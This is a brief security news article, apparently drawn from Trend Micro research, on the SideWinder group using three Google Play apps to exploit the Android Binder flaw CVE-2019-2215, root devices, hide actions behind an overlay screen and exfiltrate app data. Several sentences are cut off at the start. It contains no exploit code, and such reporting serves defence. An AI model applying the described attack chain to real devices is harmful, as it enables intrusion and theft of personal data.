Sidewinder APT group has been actively abusing a Binder vulnerability in at
least three apps found in the Google Play store.
apps, all file manager and photography tools, were uploaded starting in March 2019,
but have since been removed. The apps involved are Camero, FileCrypt and callCam.
The vulnerability effects several Android devices, including Pixel 1 and 2
phones, enabling an attacker to gain root access.
further investigation we also found that the three apps are likely to be part
of the SideWinder threat actor group’s arsenal. SideWinder, a group that has
been active since 2012, is a known threat and has reportedly targeted military
entities’ Windows machines,” wrote
Trend Micro researchers Ecular Xu and Joseph Chen.
CVE-2019-2215, is a use-after-free in binder.c that can allow an elevation of
privilege from an application to the Linux Kernel. It does require either the
installation of a malicious local application or a separate vulnerability in a
network facing application.
malicious app is on the device the download procedure begins. The first of two
stages sees a DEX file being downloaded from the command and control server which
in turn downloads an APK file. These actions take place outside the view of the
and control server contains several exploits based on CVE-2019-2215 and the
rooting tool MediaTek-SU to gain root access on the device. Once root access is
gained the app callCam is installed to give the attacker access to the device.
point the device owner is brought back into the attack when the malware asks
for additional steps to be taken to complete the apps setup. What is really happening
is the owner is viewing an overlay screen that is displayed on top of all
activity windows on the device.
window sets its attributions to FLAG_NOT_FOCUSABLE and FLAG_NOT_TOUCHABLE,
allowing the activity windows to detect and receive the users’ touch events
through the overlay screen,” the researchers said.
capabilities are then used to gain access to the following information:
of WeChat, Outlook, Twitter, Yahoo Mail, Facebook, Gmail, and Chrome
data is encrypted for transmission the C2 server.